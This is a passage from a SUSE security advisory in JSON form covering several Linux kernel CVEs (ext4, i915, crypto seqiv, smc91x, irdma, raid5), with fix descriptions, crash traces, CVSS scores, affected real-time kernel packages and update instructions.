Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 [irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
